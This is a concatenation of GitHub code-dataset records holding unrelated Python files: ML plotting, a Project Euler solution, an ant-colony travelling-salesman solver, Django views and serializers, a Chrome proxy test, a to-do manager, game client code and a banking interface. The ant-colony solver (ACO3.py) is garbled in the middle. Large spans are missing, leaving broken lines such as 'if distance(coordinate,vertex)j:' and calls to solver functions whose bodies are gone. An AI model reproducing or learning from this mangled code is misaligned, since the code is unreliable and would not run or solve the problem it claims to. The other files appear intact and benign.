filename_load = prefix + op + str(epochs_num) + wait_str + tail\n \n my_shelf = shelve.open(folder_path + filename_load + suffix)\n acc[ind] = my_shelf['data']['acc'].mean(axis=0)\n my_shelf.close()\n \nplt.close('all')\nx = np.arange(50, 937*epochs_num, step)\nx = np.concatenate((np.array([0]),x, np.array([937*epochs_num-1])))\nacc_tilde = np.zeros((len(operator_str), x.size))\nacc_ext = np.zeros((len(operator_str), len(ext_ind)))\nfor i0 in range(len(operator_str)):\n plt.plot(x, acc[i0][x])\n acc_tilde[i0] = acc[i0][x]\n acc_ext[i0] = acc[i0][ext_ind]\n\nacc_tilde = acc_tilde.T\nacc_ext = acc_ext.T\n\n# plt.figure()\n# x = np.arange(0, 937*epochs_num)\n# for i0 in range(len(operator_str)):\n# a = acc[i0][x].reshape(3,-1).mean(axis=1)\n# plt.plot(np.arange(3), a)\n\n\nplt.title(title)\nplt.grid()\n# plt.xlabel('Epoch')\nplt.xlabel('minibatch')\nplt.ylabel('accuracy')\nplt.legend(legend, loc = 'lower right')\n\n# np.savetxt('D:/Dewen/text.txt', (x,y), fmt='%.5')\n","repo_name":"HernandezEduin/UEP-Straggler-Mitigation","sub_path":"dnn/accuracy_extraction_mnist_dense_plot.py","file_name":"accuracy_extraction_mnist_dense_plot.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"29791716318","text":"def multiples(n):\n \"\"\" \n Determine if the multiple is three or five?\n\n Args:\n n (int): Input integer\n\n Returns:\n boolean: If the number is divisible by 3 or 5, it returns True, otherwise it returns False.\n \"\"\"\n if n % 3 == 0 or n % 5 == 0:\n return True\n return False\n\nsum = 0\nfor i in range(1, 1000):\n if multiples(i):\n sum += i\n\nprint(sum)","repo_name":"web-py/Euler-Project-Python","sub_path":"01-Multiples_of_3_or_5.py","file_name":"01-Multiples_of_3_or_5.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20104805828","text":"from random import randint,shuffle\nfrom time import time\n#ACO3 for multiple methods and show the curves\n\ndef distance(a,b):\n return sum([(a[i]-b[i])**2 for i in range(len(a))])**0.5\n\ndef pathdistance(path):\n d=0\n for i in range(len(path)-1):\n d+=e[path[i]][path[i+1]]\n return d\n\n# def validpath(path):\n# if sorted(path)==[0]+[i for i in range(n)]:\n# print(True)\n# else:\n# print(False)\n\ndef weightedrandom(weights,num):\n if min(weights):\n mul=10000/min(weights)#let 
minimum weight to be 10000\n else:\n mul=1000000000000\n newweights=[i*mul for i in weights]\n result=[]\n total=int(sum(newweights))\n for i in range(num):\n r=randint(0,total)\n index=0\n for weight in newweights:\n r-=weight\n if r<=0:\n result.append(index)\n break\n index+=1\n else:\n result.append(len(weights)-1)\n return result\n \n#input: number of vertex, range of dimensions in 2D array, minimum interval between any two vertices\ndef randomedge(n,ranges,interval):\n global v,e,availablelist\n v=[]#vertices, first one would be the ant net\n for i in range(n):\n while 1:\n coordinate=[]\n for i in range(len(ranges)):\n coordinate.append(randint(ranges[i][0],ranges[i][1]))\n num=0\n for vertex in v:\n if distance(coordinate,vertex)j:\n tau[i][j]=tau[j][i]=(1-rou)*tau[i][j]+tauupdate[i][j]+tauupdate[j][i]\n tau[i][i]=0\n tau[i][i]=sum(tau[i])/(n-1)#remove diagonal\n historydistance.append(generationbestdistance)\n if generationbestdistance1:\n d0=e[path[i]][path[i+1]]+e[path[j]][path[j+1]]\n d1=e[path[i]][path[j]]+e[path[i+1]][path[j+1]]\n if d11 and k-j>1:\n d0=e[path[i]][path[i+1]]+e[path[j]][path[j+1]]+e[path[k]][path[k+1]]\n d1=e[path[i]][path[j+1]]+e[path[j]][path[k+1]]+e[path[k]][path[i+1]]\n d2=e[path[i]][path[k]]+e[path[i+1]][path[j+1]]+e[path[j]][path[k+1]]\n if d10 for random\n#pheromone attractivity\nalpha=1\n#distance attractivity\nbeta=7\n\nrandomedge(n,[[0,1000],[0,1000]],10)#randomedge(n,[[0,1000],[0,1000],[0,10000]],10) for 3 d\nprint(\"vertex number\",n)\n\n'''\n#adjust alpha and beta of ACO\nimport matplotlib.pyplot as plt\nprint(\"ACO, alpha=1~3, beta=1~8\")\nacoresults=[[0 for i in range(10)] for i in range(10)]\nfor alpha in range(1,4):\n for beta in range(1,9):\n rou=1/n#pheromone decrease every generation\n q=n#amount of pheromone one ant have\n initialPheromone=antnum*q/n/(n-1)\n ACOresult=ACO(v,e,50,250,rou,q,initialPheromone,alpha,beta)\n print(alpha,beta,ACOresult[1],ACOresult[2],\"s\")\n acoresults[alpha][beta]=ACOresult\nfor b in range(1,9):\n plt.subplot(2,4,b)\n for a in range(1,4):\n print(\"{:<8d}\".format(int(acoresults[a][b][1])),end=\"\")\n colors=[\"\",\"r\",\"g\",\"b\"]\n plt.plot(acoresults[a][b][4],colors[a])\n plt.title(f\"b={b}\")\n print()\n'''\n\n'''\n#adjust rou\nimport matplotlib.pyplot as plt\nfor r in range(1,21,2):\n l=ACO(v,e,50,250,r*rou,q,initialPheromone,alpha,beta)[1]\n print(r,l)\n plt.plot(r,l,\"k.\")\nplt.show()\n'''\n\n'''\nrelationship between parameter and run time\nt1=time()\nn=100\nprint(n)\nrandomedge(n,2,[[0,1000],[0,1000]],10)\nACO(v,e,10,10,0.1,10,1,1,1)\nt2=time()\nn=200\nprint(n)\nrandomedge(n,2,[[0,1000],[0,1000]],10)\nACO(v,e,10,10,0.1,10,1,1,1)\nt3=time()\nn=400\nprint(n)\nrandomedge(n,2,[[0,1000],[0,1000]],10)\nACO(v,e,10,10,0.1,10,1,1,1)\nt4=time()\nprint(t2-t1,t3-t2,t4-t3)\n'''\n\n\n\nresults=[]\nstrings=[\"brute force\", \"greedy\", \"Prim\", \"Kruskal\", \"2-opt\", \"3-opt\", \"Genetic algorithm\", \"ACO\"]\nfunctions=[random,greedy,Prim,Kruskal,twoopt,threeopt,geneticalgorithm,ACO]\n#n=128\ninputs=[[1500000],#random\n [],\n [],\n [],\n [int(400000/n)],#2-opt\n [int(550000/n**2)],#3-opt\n [100,30000,1,67],#GA #60000 when n=512\n [int(3000/n),1000,rou,q,initialPheromone,alpha,beta]#ACO\n ]\nfor i in range(len(functions)):\n f=functions[i]\n print(strings[i],[name for name in globals() if globals()[name] is f][0])\n result=f(v,e,*inputs[i])\n results.append(result)\n print(result[1],result[2],\"s\")\n 
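\n\n# A self-contained sketch of the elementary 2-opt move that the twoopt() solver\n# above is built on (dist is any symmetric distance function; these names are\n# illustrative only, not part of this script): drop edges (i,i+1) and (j,j+1),\n# reverse the segment between them, and keep the change when it shortens the tour.\ndef two_opt_pass(path, dist):\n    improved = False\n    for i in range(len(path) - 3):\n        for j in range(i + 2, len(path) - 1):\n            d0 = dist(path[i], path[i + 1]) + dist(path[j], path[j + 1])\n            d1 = dist(path[i], path[j]) + dist(path[i + 1], path[j + 1])\n            if d1 < d0:  # reversing path[i+1..j] shortens the tour\n                path[i + 1:j + 1] = reversed(path[i + 1:j + 1])\n                improved = True\n    return improved\n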
\n'''\nprint(strings[0])\nresults.append(random(v,e,1000000))\nprint(results[0][1],results[0][2],\"s\")\nprint(strings[1])\nresults.append(greedy(v,e))\nprint(results[1][1],results[1][2],\"s\")\nprint(strings[2])\nresults.append(Prim(v,e))\nprint(results[2][1],results[2][2],\"s\")\nprint(strings[3])\nresults.append(Kruskal(v,e))\nprint(results[3][1],results[3][2],\"s\")\nprint(strings[4])\nresults.append(twoopt(v,e,int(10000/n)))\nprint(results[4][1],results[4][2],\"s\")\nprint(strings[5])\nresults.append(threeopt(v,e,int(20000/n**2)))\nprint(results[5][1],results[5][2],\"s\")\nprint(strings[6])\nresults.append(geneticalgorithm(v,e,100,240*n,1,67))\nprint(results[6][1],results[6][2],\"s\")\nprint(strings[7])\nresults.append(ACO(v,e,int(6000/n),600,rou,q,initialPheromone,alpha,beta))\nprint(results[7][1],results[7][2],\"s\")\n'''\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n#brute force, greedy, Prim, Kruskal, 2-opt, 3-opt, Genetic algorithm, ACO\nfig, axs = plt.subplots(nrows=3, ncols=3, constrained_layout=True)\nfor i in range(3):\n for j in range(3):\n \n plt.subplot(3,3,3*i+j+1)\n if i==2 and j==2:\n break\n plt.scatter(np.array([vx[0] for vx in v]),np.array([vy[1] for vy in v]),s=2,c='#000000')\n \n plt.plot(np.array([v[vx][0] for vx in results[3*i+j][0]]),np.array([v[vy][1] for vy in results[3*i+j][0]]))\n plt.title(strings[3*i+j])\n plt.text(0,1.05*1000,str(round(results[3*i+j][1],6)))\n\n\ncolors=[\"k-\",\"\",\"\",\"\",\"r-\",\"y-\",\"g-\",\"b-\"]\nfor i in range(8):\n print(i,len(results[i][3]),len(results[i][4]))\n plt.plot(results[i][3],results[i][4],colors[i])\n","repo_name":"rhit-caiy/ACO","sub_path":"ACO3.py","file_name":"ACO3.py","file_ext":"py","file_size_in_byte":16775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40577056210","text":"#!/usr/bin/env python\n\n\"\"\"\nsetup.py file for Python wrapping of a C++ network data structure\n\"\"\"\n\nfrom distutils.core import setup, Extension\n\n\nexample_module = Extension('_eventpy',\n sources=['eventpy_wrap.cxx'],\n )\n\n# sources=['eventpy_wrap.cxx', 'eventList.h'],\nsetup (name = 'eventpy',\n version = '0.1',\n author = \"Mikko Kivela\",\n description = \"\"\"Python wrapping of a C++ event list data structure.\"\"\",\n ext_modules = [example_module],\n py_modules = [\"eventpy\"],\n )\n","repo_name":"jordan0102/temporal_percolation","sub_path":"event-based-networks/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18125382604","text":"from rest_framework import serializers\n\nfrom quotes.models import Quote\n\n\nclass GetQuotesSerializer(serializers.ModelSerializer):\n class Meta:\n model = Quote\n fields = ['quote_number', 'effective_date', 'has_previous_cancelled_policy', 'is_property_owner', 'name',\n 'property_address', 'property_state', 'zip_code', 'base_premium', 'total_term_premium',\n 'monthly_term_premium', 'total_additional_fees', 'total_monthly_fees', 'total_discounts',\n 'total_monthly_discounts']\n\n\nclass PostQuotesSerializer(serializers.ModelSerializer):\n class Meta:\n model = Quote\n fields = ['is_property_owner', 'name', 'property_address', 'property_state', 
'zip_code']\n","repo_name":"sherdwhite/backend_challenge","sub_path":"quotes/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31667671204","text":"\"\"\"Utilities to store the dataset as csv.\"\"\"\nimport itertools\nimport os\nfrom typing import List\n\nimport numpy as np\nimport pandas\nimport tqdm\n\nfrom sampling.sample import Sample\n\n\ndef save_as_csv(samples: List[Sample],\n imgs: np.ndarray, # Using separate numpy array for images as np.uint8\n det_labels: np.ndarray,\n datasets_folder: str,\n dataset: str,\n split: str):\n \"\"\"Perist the samples, including all auxiliary information, to a csv file.\"\"\"\n coordinates = list(itertools.product(list(range(28)), list(range(28))))\n entries = []\n for i, sample in tqdm.tqdm(enumerate(samples), desc='Creating CSV rows'):\n new_entry = {\n 'dataset': dataset,\n 'split': split,\n 'class_1': sample.class_1,\n 'class_2': sample.class_2,\n 'p(class_1)': sample.label_1,\n 'p(class_2)': sample.label_2,\n 'det_label': det_labels[i],\n 'autoencoder_id': sample.autoencoder_id,\n }\n for coord in coordinates:\n new_entry['x_{}'.format(coord)] = imgs[i][coord]\n entries.append(new_entry)\n\n df = pandas.DataFrame(entries)\n if not os.path.exists(datasets_folder):\n os.makedirs(datasets_folder)\n df.to_csv(os.path.join(datasets_folder, f\"{dataset}-{split}.csv\"), index=True)\n","repo_name":"testingautomated-usi/ambguess-src","sub_path":"ambiguess/packing/csv_exports.py","file_name":"csv_exports.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27097891135","text":"import sys\nsys.stdin=open(\"../input.txt\",\"r\")\ndef DFS(v):\n global res\n if v==m:\n for x in res:\n print(x,end=\" \")\n print()\n else:\n for i in range(1,n+1): \n if ch[i]==0:\n ch[i]=1\n res[v]=i \n DFS(v+1)\n ch[i]=0\n\nif __name__ == \"__main__\":\n n,m=map(int,input().split())\n res=[0]*m\n ch=[0]*(n+1)\n DFS(0)","repo_name":"areum514/Algorithm","sub_path":"section6/8_순열구하기.py","file_name":"8_순열구하기.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31363034091","text":"#!../../anaconda2/bin/python\n\n\nimport os\nimport shutil\nimport random\nimport re\nimport json\nimport pickle\n\n#load feature data with filename\nfeatData = pickle.load( open( \"4_10_batch1_findAnotData.p\", \"rb\" ) )\n\n#take only one filename to test\ncorpusFilename = featData[1]['filename']\n\n#get adjudication filename: /uufs/chpc.utah.edu/common/home/conway-group1/TRIANGULUM_ANNOTATION/eHostWorkSpace/4_10_batch1/corpus/9_jd_246_1523844165_8ck5iq_trees.txt\nparseList = corpusFilename.split('/')\nadjudicationFilename = '/'.join(parseList[0:-2])+'/adjudication/'+parseList[-1]+'.knowtator.xml'\nsubreddit = parseList[-1].split('_')[-1].replace('.txt','')\n\n#read annotation and corpus data\nimport reader\nanotDicList = reader.annotFileReader(adjudicationFilename)\nfor t in anotDicList:\n\tprint(t)\ncorpusData = reader.corpusFileReader(corpusFilename)\n#print(corpusData)\n\n#Rule based\nimport RegExp \n#import re\n\nruleBasedAnnotList = RegExp.regExDetect_subreddit(corpusData, subreddit)\nprint(subreddit)\n#print(anotDicList)\nprint('-----------')\nfor t in ruleBasedAnnotList:\n\tprint(t)\n#print(ruleBasedAnnotList)\n\ncorrectNum=0\nfor r in 
ruleBasedAnnotList:\n\trStart = r['start']\n\trEnd = r['end']\n\trCat = r['category']\n\tfor a in anotDicList:\n\t\taStart = a['start']\n\t\taEnd = a['end']\n\t\taCat = a['class']\n\t\tif min(aEnd,rEnd)-max(aStart,rStart)>0 and aCat==rCat:\n\t\t\tcorrectNum = correctNum+1\n\nprint('Average Precision:', correctNum, correctNum/float(len(ruleBasedAnnotList)))\t\t\t\n","repo_name":"grace-mengke-hu/TRIANGULUM","sub_path":"Annotation/testRulebased.py","file_name":"testRulebased.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12300830685","text":"from common.chrome_proxy_shared_page_state import ChromeProxySharedPageState\nfrom telemetry.page import page as page_module\nfrom telemetry import story\n\n\nclass BlockOncePage(page_module.Page):\n\n def __init__(self, url, page_set):\n super(BlockOncePage, self).__init__(url=url,page_set=page_set,\n shared_page_state_class=ChromeProxySharedPageState)\n\n def RunNavigateSteps(self, action_runner):\n super(BlockOncePage, self).RunNavigateSteps(action_runner)\n # Test block-once on a POST request.\n # Ensure that a subsequent request uses the data reduction proxy.\n action_runner.ExecuteJavaScript('''\n (function() {\n window.post_request_completed = false;\n var request = new XMLHttpRequest();\n request.open(\"POST\",\n \"http://chromeproxy-test.appspot.com/default?\" +\n \"respBody=T0s=&respHeader=eyJBY2Nlc3MtQ29udHJvbC1BbGxvdy1Pcml\" +\n \"naW4iOlsiKiJdfQ==&respStatus=200&flywheelAction=block-once\");\n request.onload = function() {\n window.post_request_completed = true;\n var viaProxyRequest = new XMLHttpRequest();\n viaProxyRequest.open(\"GET\",\n \"http://check.googlezip.net/image.png\");\n viaProxyRequest.send();\n };\n request.send();\n })();\n ''')\n action_runner.WaitForJavaScriptCondition(\n \"window.post_request_completed == true\", timeout=30)\n\nclass BlockOnceStorySet(story.StorySet):\n\n \"\"\" Chrome proxy test sites \"\"\"\n\n def __init__(self):\n super(BlockOnceStorySet, self).__init__()\n\n # Test block-once for a GET request.\n urls_list = [\n 'http://check.googlezip.net/blocksingle/',\n ]\n\n for url in urls_list:\n self.AddStory(BlockOncePage(url, self))\n","repo_name":"kiwibrowser/src","sub_path":"tools/chrome_proxy/integration_tests/chrome_proxy_pagesets/block_once.py","file_name":"block_once.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"22132659463","text":"import os\r\nimport pickle\r\nimport datetime\r\n\r\n# Define a class to represent a task\r\nclass Task:\r\n def __init__(self, description, due_date=None, priority=1, completed=False):\r\n self.description = description\r\n self.due_date = due_date\r\n self.priority = priority\r\n self.completed = completed\r\n \r\n def __repr__(self):\r\n return f\"{self.description} - Due: {self.due_date.strftime('%m/%d/%Y')} - Priority: {self.priority}\"\r\n\r\n\r\n# Define a class to manage the to-do list\r\nclass ToDoList:\r\n def __init__(self):\r\n self.tasks = []\r\n self.filename = \"tasks.pkl\"\r\n self.load_tasks()\r\n \r\n def add_task(self):\r\n description = input(\"Enter task description: \")\r\n due_date_str = input(\"Enter due date (MM/DD/YYYY) or leave blank: \")\r\n if due_date_str:\r\n due_date = datetime.datetime.strptime(due_date_str, \"%m/%d/%Y\")\r\n else:\r\n due_date = None\r\n priority = int(input(\"Enter priority (1-5, 5 is highest): \"))\r\n 
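# Note: datetime.strptime and int() both raise ValueError on malformed\r\n        # input, so a bad date or priority entered here aborts add_task.\r\n        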
task = Task(description, due_date, priority)\r\n self.tasks.append(task)\r\n print(\"Task added successfully.\")\r\n \r\n def list_tasks(self):\r\n print(\"Tasks:\")\r\n for i, task in enumerate(self.tasks):\r\n print(f\"{i+1}. {task}\")\r\n \r\n def complete_task(self):\r\n self.list_tasks()\r\n choice = int(input(\"Enter the number of the task to mark as completed: \"))\r\n if 1 <= choice <= len(self.tasks):\r\n task = self.tasks[choice-1]\r\n task.completed = True\r\n print(\"Task marked as completed.\")\r\n else:\r\n print(\"Invalid choice.\")\r\n \r\n def remove_task(self):\r\n self.list_tasks()\r\n choice = int(input(\"Enter the number of the task to remove: \"))\r\n if 1 <= choice <= len(self.tasks):\r\n task = self.tasks[choice-1]\r\n self.tasks.remove(task)\r\n print(\"Task removed successfully.\")\r\n else:\r\n print(\"Invalid choice.\")\r\n \r\n def save_tasks(self):\r\n with open(self.filename, \"wb\") as f:\r\n pickle.dump(self.tasks, f)\r\n \r\n def load_tasks(self):\r\n if os.path.exists(self.filename):\r\n with open(self.filename, \"rb\") as f:\r\n self.tasks = pickle.load(f)\r\n \r\n def sort_tasks(self):\r\n self.tasks.sort(key=lambda task: (task.completed, task.priority, task.due_date))\r\n \r\n def display_menu(self):\r\n print(\"\\nTo-Do List Manager\\n\")\r\n print(\"1. Add Task\")\r\n print(\"2. List Tasks\")\r\n print(\"3. Mark Task as Completed\")\r\n print(\"4. Remove Task\")\r\n print(\"5. Save Tasks\")\r\n print(\"6. Exit\")\r\n \r\n def run(self):\r\n while True:\r\n self.sort_tasks()\r\n self.display_menu()\r\n choice = input(\"Enter your choice (1-6): \")\r\n if choice == \"1\":\r\n self.add_task()\r\n elif choice == \"2\":\r\n self.list_tasks()\r\n elif choice == \"3\":\r\n self.complete_task()\r\n elif choice == \"4\":\r\n self.remove_task()\r\n elif choice == \"5\":\r\n self.save_tasks()\r\n elif choice == \"6\":\r\n break\r\n else:\r\n print(\"Invalid choice. 
Please try again.\")\r\n\r\n# Create a to-do list and run the program\r\ntodo_list = ToDoList()\r\ntodo_list.run()","repo_name":"abolfazl9403/python-project","sub_path":"to do list manager.py","file_name":"to do list manager.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"27322091971","text":"\nlstNumber = [4, 3, 2, 1]\n# Start from the first element so a list whose first entry is already the\n# closest (or a single-item list) is handled correctly.\nclosest = lstNumber[0]\nnumDiff = abs(lstNumber[0])\n\nfor num in lstNumber:\n    diff = 0 - num\n    diff = abs(diff)\n    if diff < numDiff:\n        numDiff = diff\n        closest = num\n\nprint (\"Closest to 0 is \", closest)\n\n\n","repo_name":"ArjunAranetaCodes/MoreCodes-Python","sub_path":"Lists/problem20.py","file_name":"problem20.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"20870928590","text":"from django.db import connection\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\n\nfrom inventory.models import sells\nfrom items.models import Item\nfrom pharmacy.models import Pharmacy\nfrom customer.models import customer\nfrom cart.models import contains\nfrom customer.models import address_list\nfrom pharmacy.models import contact_pharmacy\nitem_OTC = []\nfrom cart.views import addItem\n\ndef showSearch(request):\n    print(\"hello\")\n    return render(request,'items/search.html')\n\n\ndef showSearchResult(request):\n    name=request.session['name']\n    user=customer.objects.get(username=name)\n    cart = contains.objects.filter(cart_id=user)\n    count = 0\n    for cart_id in cart:\n        count = count + 1\n    print(count)\n\n    print(request)\n\n    if request.method == 'POST':\n        print('request')\n        itemname = request.POST.get('search')\n        try:\n            status = Item.objects.filter(item_name__icontains=itemname)\n            print('hi')\n            print(status)\n            for a in status:\n\n                if a.otc_or_not is True:\n                    print ('loop')\n                    print('if')\n                    item_OTC.append(a)\n                    print (item_OTC)\n                else:\n                    continue\n            print(status)\n            return render(request,'items/search_result.html',{'items': item_OTC,'user':user,'items_in_cart':count})\n\n        except Exception:\n            print ('except')\n            return render(request, 'items/search_result.html', {'user':user,'items_in_cart':count})\n\n    else:\n        print ('o else')\n        return render(request, 'items/search_result.html', {'user':user,'items_in_cart':count})\n\ndef showSearchResultPharmacy(request,item_id):\n    name = request.session['name']\n    user = customer.objects.get(username=name)\n    address_instance = address_list.objects.filter(username=user, default=True).first()\n    cart = contains.objects.filter(cart_id=user)\n    count = 0\n    for cart_id in cart:\n        count = count + 1\n    print(count)\n    set_of_pharmacy = []\n    item_info_sells = []\n    t=sells.objects.filter(item_id=item_id)\n    item=Item.objects.get(item_id=item_id)\n    cursor=connection.cursor()\n    cursor.execute(\"SELECT * FROM pharmacy_Pharmacy m INNER JOIN inventory_sells s on m.pharmacy_id=s.pharmacy_id_id JOIN pharmacy_contact_pharmacy p on m.pharmacy_id=p.pharmacy_id where p.default=true and s.item_id_id=%s\", [item_id])\n    for row in cursor.fetchall():\n        if row[10]-address_instance.address_pincode<=3 and row[13]>0:\n            set_of_pharmacy.append(row)\n    print (set_of_pharmacy)\n    context={'item':item,'pharmacy':set_of_pharmacy,'user':user,'items_in_cart':count}\n\n    return 
render(request,'items/pharmacy_having_item.html',context=context)\n\n","repo_name":"Shivam2302/OnlinePharmacy","sub_path":"Code/OnlinePharmacy/items/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"37019221681","text":"#Embedded file name: e:\\jenkins\\workspace\\client_SERENITY\\branches\\release\\SERENITY\\eve\\client\\script\\ui\\shared\\fittingGhost\\ghostFittingUtil.py\r\nfrom dogma.items.shipFittableDogmaItem import ShipFittableDogmaItem\r\nimport evetypes\r\nimport util\r\nOFFLINE = 0\r\nONLINE = 1\r\nACTIVE = 2\r\nOVERHEATED = 3\r\n\r\nclass GhostFittingDataObject(object):\r\n\r\n def __init__(self, locationID, flagID, typeID, ownerID = None, number = None):\r\n self.locationID = locationID\r\n self.flagID = flagID\r\n self.typeID = typeID\r\n self.number = number\r\n self.itemID = self.GetItemKey()\r\n self.categoryID = evetypes.GetCategoryID(typeID)\r\n self.groupID = evetypes.GetGroupID(typeID)\r\n self.ownerID = session.charid\r\n\r\n def GetItemKey(self):\r\n if self.number is None:\r\n return '%s_%s' % (self.flagID, self.typeID)\r\n else:\r\n return '%s_%s_%s' % (self.flagID, self.typeID, self.number)\r\n\r\n def SetNumber(self, number):\r\n self.number = number\r\n self.itemID = self.GetItemKey()\r\n\r\n\r\nclass FakeGhostFittingDogmaItem(object):\r\n pass\r\n\r\n\r\nclass GhostFittingDogmaItem(ShipFittableDogmaItem):\r\n __guid__ = 'GhostFittingDogmaItem'\r\n\r\n def __init__(self, dogmaLocation, ghostFittingItem, ownerID):\r\n item = FakeGhostFittingDogmaItem()\r\n item.itemID = ghostFittingItem.GetItemKey()\r\n item.typeID = ghostFittingItem.typeID\r\n item.groupID = evetypes.GetGroupID(item.typeID)\r\n item.categoryID = evetypes.GetCategoryID(item.typeID)\r\n super(GhostFittingDogmaItem, self).__init__(dogmaLocation, item)\r\n self.ownerID = ownerID\r\n self.fittedItems = {}\r\n self.subLocations = {}\r\n\r\n def Load(self):\r\n self.attributes = {}\r\n\r\n def Unload(self):\r\n super(GhostFittingDogmaItem, self).Unload()\r\n self.dogmaLocation.RemoveSubLocationFromLocation(self.itemID)\r\n\r\n def SetLocation(self, locationID, locationDogmaItem, flagID):\r\n super(GhostFittingDogmaItem, self).SetLocation(locationID, locationDogmaItem, flagID)\r\n\r\n def UnsetLocation(self, locationDogmaItem):\r\n super(GhostFittingDogmaItem, self).UnsetLocation(locationDogmaItem)\r\n locationDogmaItem.RemoveSubLocation(self.itemID)\r\n\r\n def GetEnvironmentInfo(self):\r\n otherID = None\r\n if self.location is not None:\r\n otherID = self.dogmaLocation.GetSlotOther(self.location.itemID, self.flagID)\r\n return util.KeyVal(itemID=self.itemID, shipID=self.GetShipID(), charID=self.GetPilot(), otherID=otherID, targetID=None, effectID=None)\r\n","repo_name":"connoryang/dec-eve-serenity","sub_path":"client/eve/client/script/ui/shared/fittingGhost/ghostFittingUtil.py","file_name":"ghostFittingUtil.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"15524343675","text":"import turtle as t\nfrom turtle import Screen\nfrom random import randint, choice\nfrom colors import random_color\n\ndef main():\n total_steps = int(input(f\"How many steps the drunken will make? 
Type a number: \"))\n # borracho = RandomWalk()\n # borracho.walk()\n\n borracho = t.Turtle()\n borracho.width(4)\n borracho.speed(0)\n t.colormode(255)\n step_size = 15\n\n for _ in range(total_steps):\n towards = choice([0, 270, 180, 90])\n borracho.setheading(towards)\n borracho.pencolor(random_color)\n borracho.fd(step_size)\n\n screen = Screen()\n screen.screensize(600)\n screen.exitonclick()\n\n\n# class RandomWalk:\n#\n# def __init__(self, total_steps):\n# self.total_steps = total_steps\n# self.color = colors[randint(0, 8)]\n# self.step = 10\n#\n# def walk(self):\n# my_turtle = Turtle()\n# towards = choice([0, 270, 180, 90])\n# print(towards)\n# for _ in range(total_steps):\n# my_turtle.setheading(self, towards)\n# my_turtle.pencolor(self.color)\n# my_turtle.fd(self.step)\n\n\nif __name__ == '__main__':\n main()","repo_name":"ODCenteno/python_100days","sub_path":"day_18-canva-dots/random_walk.py","file_name":"random_walk.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22795397630","text":"\nfrom Interface import Interface\nfrom ClientTable import ClientTable\nfrom Errors import DNEError, NoFundsError, NonAccError, NoFundsSysError, AccDoubleJeopardyError\nfrom System import System\n\nclass TESTInterface(Interface):\n\tdef __init__(self, clientTable = ClientTable(), system = System(0.00)):\n\t\tself.__clientTable = clientTable\n\t\tself.__system = system\n\n\t# raises DNEError if account doesn't exist\n\tdef inquire(self, client):\n\t\twhich = input(\"For which account?:\")\n\t\tbalance = client.inquire(which)\n\t\tprint(\"Balance = ${}\".format(balance))\n\n\t# raises\n\t# NoFundsSysError if system has insufficient funds\n\t# ValueError if amt can't be parsed\n\t# NonAccError if acc doesn't exist in client\n\tdef withdraw(self, client):\n\t\tamt = input(\"How much?:\")\n\t\tamt = float(amt)\n\t\tamt = round(amt, 2)\n\n\t\twhich = input(\"For which account?:\")\n\t\tself.__system.withdraw(amt)\n\t\tclient.withdraw(which, amt)\n\n\t# raises\n\t# ValueError if input is off\n\t# DNEError if account does not exist\n\tdef deposit(self, client):\n\t\tamt = input(\"How much?\")\n\t\tamt = float(amt)\n\n\t\twhich = input(\"For which account?:\")\n\t\tclient.deposit(which, amt)\n\t\tself.__system.deposit(amt)\n\n\t# raises\n\t# Value Error if can't parse value\n\t# NoFundError if there are no funds in fromAcc\n\t# NonAccError if one of the accounts doesn't exist\n\tdef transfer(self, client):\n\n\t\tamt = input(\"How much?\")\n\t\tamt = float(amt)\n\n\t\tfromAcc = input(\"From which account?:\")\n\t\ttoAcc = input(\"To which account?\")\n\t\tclient.transfer(fromAcc, toAcc, amt)\n\n\n\tdef list(self, client):\n\t\tprint(\"savings\")\n\t\tprint(\"checking\")\n\t\totherAccs = client.otherAccounts()\n\t\tfor name in otherAccs:\n\t\t\tprint(name)\n\n\t# Raises\n\t# AccDoubleJeopardyError if acc_name already exists\n\tdef addAcc(self, client):\n\t\tacc_name = input(\"Under what name?:\").strip()\n\t\tclient.addAcc(acc_name)\n\n\n\tdef run(self):\n\n\t\twhile True:\n\t\t\tuser = input(\"User Name >>\")\n\t\t\tpassword = input(\"Password >>\")\n\n\t\t\ttry:\n\t\t\t\tclient = self.__clientTable.get_client(user, password)\n\t\t\t\tprint(\"Hello {}!\".format(client.user))\n\t\t\t\tbreak\n\t\t\texcept DNEError:\n\t\t\t\tprint(\"Invalid Username or Password\")\n\n\n\t\twhile True:\n\t\t\tprint(\"------------\")\n\t\t\tprint(\"Options: \")\n\t\t\tprint(\"1) Inquire\")\n\t\t\tprint(\"2) 
